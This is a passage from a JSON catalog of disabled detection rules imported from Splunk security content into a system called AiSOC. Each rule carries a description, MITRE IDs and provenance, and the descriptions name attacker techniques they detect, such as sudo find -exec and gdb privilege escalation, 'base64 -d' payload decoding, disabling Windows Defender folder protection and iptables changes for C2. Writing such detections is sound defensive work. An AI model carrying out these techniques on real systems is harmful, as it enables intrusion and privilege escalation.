escalation. 
If confirmed malicious, this could allow an attacker to maintain persistent access and execute tasks with elevated privileges, potentially leading to unauthorized system access and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scheduled-task-with-highest-privileges.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2f15e1a4-0fc2-49dd-919e-cbbe60699218", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scheduled_task_with_highest_privileges.yml" } }, { "id": "splunk-security-content-2f1c5fd1-4b8a-4f5d-a0e9-7d6a8e2f5e1e", "type": "detection", "name": "Detect DNS Query to Decommissioned S3 Bucket", "description": "This detection identifies DNS queries to domains that match previously decommissioned S3 buckets. This activity is significant because attackers may attempt to recreate deleted S3 buckets that were previously public to hijack them for malicious purposes. 
If successful, this could allow attackers to host malicious content or exfiltrate data through compromised bucket names that may still be referenced by legitimate applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-dns-query-to-decommissioned-s3-bucket.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2f1c5fd1-4b8a-4f5d-a0e9-7d6a8e2f5e1e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_dns_query_to_decommissioned_s3_bucket.yml" } }, { "id": "splunk-security-content-2f3862c6-45ff-4a02-9bd4-7e25c209fcd9", "type": "detection", "name": "Cisco SD-WAN - Arbitrary File Overwrite Exploitation Activity", "description": "This analytic detects exploitation attempts targeting Cisco Catalyst SD-WAN Manager.\nIt leverages the \"serviceproxy_access.log\" and identifies source-host combinations that perform, within a short period, all key stages of the exploitation as reported in public POCs: authentication/config collection (`.dca`), upload actions (`uploadAck`), and payload-style access (`.gz/*`).\nThe behavior can indicate attempted exploitation activity associated with Cisco Catalyst SD-WAN Manager vulnerabilities CVE-2026-20122 (Arbitrary File Overwrite) and CVE-2026-20128 (Information Disclosure).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, 
"playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-sd-wan-arbitrary-file-overwrite-exploitation-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2f3862c6-45ff-4a02-9bd4-7e25c209fcd9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_sd_wan___arbitrary_file_overwrite_exploitation_activity.yml" } }, { "id": "splunk-security-content-2f3a4092-548b-421c-9caa-84918e1787ef", "type": "detection", "name": "Windows App Layer Protocol Wermgr Connect To NamedPipe", "description": "The following analytic detects the wermgr.exe process creating or connecting to a named pipe. It leverages Sysmon EventCodes 17 and 18 to identify these actions. This activity is significant because wermgr.exe, a legitimate Windows OS Problem Reporting application, is often abused by malware such as Trickbot and Qakbot to execute malicious code. 
If confirmed malicious, this behavior could indicate that an attacker has injected code into wermgr.exe, potentially allowing them to communicate covertly, escalate privileges, or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-app-layer-protocol-wermgr-connect-to-namedpipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2f3a4092-548b-421c-9caa-84918e1787ef", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_app_layer_protocol_wermgr_connect_to_namedpipe.yml" } }, { "id": "splunk-security-content-2f4abe6d-5991-464d-8216-f90f42999764", "type": "detection", "name": "Kubernetes Access Scanning", "description": "The following analytic detects potential scanning activities within a Kubernetes environment. It identifies unauthorized access attempts, probing of public APIs, or attempts to exploit known vulnerabilities by monitoring Kubernetes audit logs for repeated failed access attempts or unusual API requests. This activity is significant for a SOC as it may indicate an attacker's preliminary reconnaissance to gather information about the system. 
If confirmed malicious, this activity could lead to unauthorized access to sensitive systems or data, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-access-scanning.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2f4abe6d-5991-464d-8216-f90f42999764", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_access_scanning.yml" } }, { "id": "splunk-security-content-2fa9dec8-9d8e-46d3-96c1-202c06f0e6e1", "type": "detection", "name": "Windows Phishing PDF File Executes URL Link", "description": "The following analytic detects suspicious PDF viewer processes spawning browser application child processes. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process names. This activity is significant as it may indicate a PDF spear-phishing attempt where a malicious URL link is executed, leading to potential payload download. 
If confirmed malicious, this could allow attackers to execute code, escalate privileges, or persist in the environment by exploiting the user's browser to connect to a malicious site.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-phishing-pdf-file-executes-url-link.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2fa9dec8-9d8e-46d3-96c1-202c06f0e6e1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_phishing_pdf_file_executes_url_link.yml" } }, { "id": "splunk-security-content-2fcbce12-cffa-4c84-b70c-192604d201d0", "type": "detection", "name": "PingID New MFA Method After Credential Reset", "description": "The following analytic identifies the provisioning of a new MFA device shortly after a password reset. It detects this activity by correlating Windows Event Log events for password changes (EventID 4723, 4724) with PingID logs indicating device pairing. This behavior is significant as it may indicate a social engineering attack where a threat actor impersonates a valid user to reset credentials and add a new MFA device. 
If confirmed malicious, this activity could allow an attacker to gain persistent access to the compromised account, bypassing traditional security measures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621", "T1556.006", "T1098.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/pingid-new-mfa-method-after-credential-reset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2fcbce12-cffa-4c84-b70c-192604d201d0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/pingid_new_mfa_method_after_credential_reset.yml" } }, { "id": "splunk-security-content-2ff4e0c2-8256-4143-9c07-1e39c7231111", "type": "detection", "name": "Linux Find Privilege Escalation", "description": "The following analytic detects the use of the 'find' command with 'sudo' and '-exec' options, which can indicate an attempt to escalate privileges on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line arguments. This activity is significant because it can allow a user to execute system commands as root, potentially leading to a root shell. 
If confirmed malicious, this could enable an attacker to gain full control over the system, leading to severe security breaches and unauthorized access to sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-find-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2ff4e0c2-8256-4143-9c07-1e39c7231111", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_find_privilege_escalation.yml" } }, { "id": "splunk-security-content-300688e4-365c-4486-a065-7c884462b31d", "type": "detection", "name": "AWS ECR Container Upload Unknown User", "description": "The following analytic detects the upload of a new container image to AWS Elastic Container Registry (ECR) by an unknown user. It leverages AWS CloudTrail logs to identify `PutImage` events from the ECR service, filtering out known users. This activity is significant because container uploads should typically be performed by a limited set of authorized users. 
If confirmed malicious, this could indicate unauthorized access, potentially leading to the deployment of malicious containers, data exfiltration, or further compromise of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-ecr-container-upload-unknown-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "300688e4-365c-4486-a065-7c884462b31d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_ecr_container_upload_unknown_user.yml" } }, { "id": "splunk-security-content-3032741c-d6fc-4c69-8988-be8043d6478c", "type": "detection", "name": "Windows Impair Defense Disable Controlled Folder Access", "description": "The following analytic detects a modification in the Windows registry that disables the Windows Defender Controlled Folder Access feature. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the EnableControlledFolderAccess registry setting. This activity is significant because Controlled Folder Access is designed to protect critical folders from unauthorized access, including ransomware attacks. 
If this activity is confirmed malicious, it could allow attackers to bypass a key security feature, potentially leading to unauthorized access or modification of sensitive files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-controlled-folder-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3032741c-d6fc-4c69-8988-be8043d6478c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_controlled_folder_access.yml" } }, { "id": "splunk-security-content-303b38b2-c03f-44e2-8f41-4594606fcfc7", "type": "detection", "name": "Linux Obfuscated Files or Information Base64 Decode", "description": "The following analytic detects the use of the base64 decode command on Linux systems, which is often used to deobfuscate files. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include \"base64 -d\" or \"base64 --decode\". This activity is significant as it may indicate an attempt to hide malicious payloads or scripts. 
If confirmed malicious, an attacker could use this technique to execute hidden code, potentially leading to unauthorized access, data exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-obfuscated-files-or-information-base64-decode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "303b38b2-c03f-44e2-8f41-4594606fcfc7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_obfuscated_files_or_information_base64_decode.yml" } }, { "id": "splunk-security-content-309d59dc-1e1b-49b2-9800-7cf18d12f7b7", "type": "detection", "name": "Linux Iptables Firewall Modification", "description": "The following analytic detects suspicious command-line activity that modifies the iptables firewall settings on a Linux machine. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command patterns that alter firewall rules to accept traffic on certain TCP ports. This activity is significant as it can indicate malware, such as CyclopsBlink, modifying firewall settings to allow communication with a Command and Control (C2) server. 
If confirmed malicious, this could enable attackers to maintain persistent access and exfiltrate data, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-iptables-firewall-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "309d59dc-1e1b-49b2-9800-7cf18d12f7b7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_iptables_firewall_modification.yml" } }, { "id": "splunk-security-content-30a0e9f8-f1dd-4f9d-8fc2-c622461d781c", "type": "detection", "name": "AWS ECR Container Scanning Findings High", "description": "The following analytic identifies high-severity findings from AWS Elastic Container Registry (ECR) image scans. It detects these activities by analyzing AWS CloudTrail logs for the DescribeImageScanFindings event, specifically filtering for findings with a high severity level. This activity is significant for a SOC because high-severity vulnerabilities in container images can lead to potential exploitation if not addressed. 
If confirmed malicious, attackers could exploit these vulnerabilities to gain unauthorized access, execute arbitrary code, or escalate privileges within the container environment, posing a significant risk to the overall security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-ecr-container-scanning-findings-high.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "30a0e9f8-f1dd-4f9d-8fc2-c622461d781c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_ecr_container_scanning_findings_high.yml" } }, { "id": "splunk-security-content-30a334c1-f9a5-4fbd-8958-5b65a8435cb2", "type": "detection", "name": "Windows Default Rdp File Deletion", "description": "This detection identifies the deletion of the Default.rdp file from a user\u2019s Documents folder. This file is automatically created or updated by the Remote Desktop Connection client (mstsc.exe) whenever a user initiates an RDP session. It contains session configuration data, such as the remote hostname and display settings. While the presence of this file is normal during legitimate RDP usage, its deletion may indicate an attempt to conceal evidence of remote access activity. Threat actors and red team operators often remove Default.rdp as part of post-access cleanup to evade forensic detection. 
Detecting this action\u2014especially when correlated with recent RDP activity\u2014can help identify defense evasion techniques and uncover potentially malicious use of remote desktop connections. Monitoring for this file's deletion adds an important layer of visibility into user behavior and can serve as an early indicator of interactive attacker presence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-default-rdp-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "30a334c1-f9a5-4fbd-8958-5b65a8435cb2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_default_rdp_file_deletion.yml" } }, { "id": "splunk-security-content-30c32c5c-41fe-45db-84fe-275e4320da3f", "type": "detection", "name": "Windows Alternate DataStream - Process Execution", "description": "The following analytic detects when a process attempts to execute a file from within an NTFS file system alternate data stream. This detection leverages process execution data from sources like Windows process monitoring or Sysmon Event ID 1, focusing on specific processes known for such behavior. This activity is significant because alternate data streams can be used by threat actors to hide malicious code, making it difficult to detect. 
If confirmed malicious, this could allow an attacker to execute hidden code, potentially leading to unauthorized actions and further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-alternate-datastream-process-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "30c32c5c-41fe-45db-84fe-275e4320da3f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_alternate_datastream___process_execution.yml" } }, { "id": "splunk-security-content-30c47f45-dd6a-4720-9963-0bca6c8686ef", "type": "detection", "name": "Azure AD New Custom Domain Added", "description": "The following analytic detects the addition of a new custom domain within an Azure Active Directory (AD) tenant. It leverages Azure AD AuditLogs to identify successful \"Add unverified domain\" operations. This activity is significant as it may indicate an adversary attempting to establish persistence by setting up identity federation backdoors, allowing them to impersonate users and bypass authentication mechanisms. 
If confirmed malicious, this could enable attackers to gain unauthorized access, escalate privileges, and maintain long-term access to the Azure AD environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-new-custom-domain-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "30c47f45-dd6a-4720-9963-0bca6c8686ef", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_new_custom_domain_added.yml" } }, { "id": "splunk-security-content-310b7da2-ab52-437f-b1bf-0bd458674308", "type": "detection", "name": "Linux GDB Privilege Escalation", "description": "The following analytic detects the execution of the GNU Debugger (GDB) with specific flags that indicate an attempt to escalate privileges on a Linux system. It leverages Endpoint Detection and Response (EDR) telemetry to identify processes where GDB is run with the `-nx`, `-ex`, and `sudo` flags. This activity is significant because it can allow a user to execute system commands as root, potentially leading to a root shell. 
If confirmed malicious, this could result in full system compromise, allowing an attacker to gain complete control over the affected endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-gdb-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "310b7da2-ab52-437f-b1bf-0bd458674308", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_gdb_privilege_escalation.yml" } }, { "id": "splunk-security-content-31302468-93c9-4eca-9ae3-2d41f53a4e2b", "type": "detection", "name": "Windows Security Support Provider Reg Query", "description": "The following analytic identifies command-line activity querying the registry for Security Support Providers (SSPs) related to Local Security Authority (LSA) protection and configuration. This detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on processes accessing specific LSA registry paths. Monitoring this activity is crucial as adversaries and post-exploitation tools like winpeas may use it to gather information on LSA protections, potentially leading to credential theft. 
If confirmed malicious, attackers could exploit this to scrape password hashes or plaintext passwords from memory, significantly compromising system security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-security-support-provider-reg-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "31302468-93c9-4eca-9ae3-2d41f53a4e2b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_security_support_provider_reg_query.yml" } }, { "id": "splunk-security-content-313681a2-da8e-11eb-adad-acde48001122", "type": "detection", "name": "Print Spooler Adding A Printer Driver", "description": "The following analytic detects the addition of new printer drivers by monitoring Windows PrintService operational logs, specifically EventCode 316. This detection leverages log data to identify messages indicating the addition or update of printer drivers, such as \"kernelbase.dll\" and \"UNIDRV.DLL.\" This activity is significant as it may indicate exploitation attempts related to vulnerabilities like CVE-2021-34527 (PrintNightmare). If confirmed malicious, attackers could gain code execution or escalate privileges, potentially compromising the affected system. 
Immediate isolation and investigation of the endpoint are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/print-spooler-adding-a-printer-driver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "313681a2-da8e-11eb-adad-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/print_spooler_adding_a_printer_driver.yml" } }, { "id": "splunk-security-content-3141a041-4f57-4277-9faa-9305ca1f8e5b", "type": "detection", "name": "Internal Horizontal Port Scan NMAP Top 20", "description": "This analytic identifies instances where an internal host has attempted to communicate with 250 or more destination IP addresses using one of the NMAP top 20 ports. Horizontal port scans from internal hosts can indicate reconnaissance or scanning activities, potentially signaling malicious intent or misconfiguration. 
By monitoring network traffic logs, this detection helps detect and respond to such behavior promptly, enhancing network security and preventing potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/internal-horizontal-port-scan-nmap-top-20.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3141a041-4f57-4277-9faa-9305ca1f8e5b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/internal_horizontal_port_scan_nmap_top_20.yml" } }, { "id": "splunk-security-content-314cb263-7eeb-4d45-b693-bb21699c73d2", "type": "detection", "name": "Windows Chromium Browser No Security Sandbox Process", "description": "The following analytic detects instances where a Chrome or Chromium-based browser is launched with the --no-sandbox flag, a known indicator of potentially malicious or suspicious behavior. While this flag is occasionally used during software development or testing, it is rarely seen in normal user activity. Threat actors often abuse this setting to disable Chrome's built-in security sandbox, making it easier to execute malicious code or escape browser isolation. This behavior is commonly observed in malware droppers or loaders that embed Chromium components for command and control, credential theft, or UI spoofing. 
Analysts should investigate such events, especially if they originate from unusual parent processes (e.g., powershell.exe, cmd.exe, or unknown binaries), or if accompanied by other indicators such as file drops, process injection, or outbound network activity. Filtering by command-line arguments and process ancestry can help reduce false positives and surface high-fidelity detections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chromium-browser-no-security-sandbox-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "314cb263-7eeb-4d45-b693-bb21699c73d2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chromium_browser_no_security_sandbox_process.yml" } }, { "id": "splunk-security-content-31641378-2fa9-42b1-948e-25e281cb98f7", "type": "detection", "name": "O365 High Number Of Failed Authentications for User", "description": "The following analytic identifies an O365 account experiencing more than 20 failed authentication attempts within 5 minutes. It uses O365 Unified Audit Logs, specifically \"UserLoginFailed\" events, to monitor and flag accounts exceeding this threshold. This activity is significant as it may indicate a brute force attack or password guessing attempt. If confirmed malicious, an attacker could gain unauthorized access to the O365 environment, potentially compromising sensitive emails, documents, and other data. 
Prompt investigation and action are crucial to prevent unauthorized access and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-high-number-of-failed-authentications-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "31641378-2fa9-42b1-948e-25e281cb98f7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_high_number_of_failed_authentications_for_user.yml" } }, { "id": "splunk-security-content-31702fc0-2682-11ec-85c3-acde48001122", "type": "detection", "name": "Sdelete Application Execution", "description": "The following analytic detects the execution of the sdelete.exe application, a Sysinternals tool often used by adversaries to securely delete files and remove forensic evidence from a targeted host. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. Monitoring this activity is crucial as sdelete.exe is not commonly used in regular operations and its presence may indicate an attempt to cover malicious activities. 
If confirmed malicious, this could lead to the loss of critical forensic data, hindering incident response and investigation efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/sdelete-application-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "31702fc0-2682-11ec-85c3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/sdelete_application_execution.yml" } }, { "id": "splunk-security-content-31810b7a-0abe-42be-a210-0dec8106afee", "type": "detection", "name": "Linux Auditd Kernel Module Using Rmmod Utility", "description": "The following analytic detects suspicious use of the `rmmod` utility for kernel module removal, which may indicate an attacker attempt to unload critical or security-related kernel modules. The `rmmod` command is used to remove modules from the Linux kernel, and unauthorized use can be a tactic to disable security features, conceal malicious activities, or disrupt system operations. 
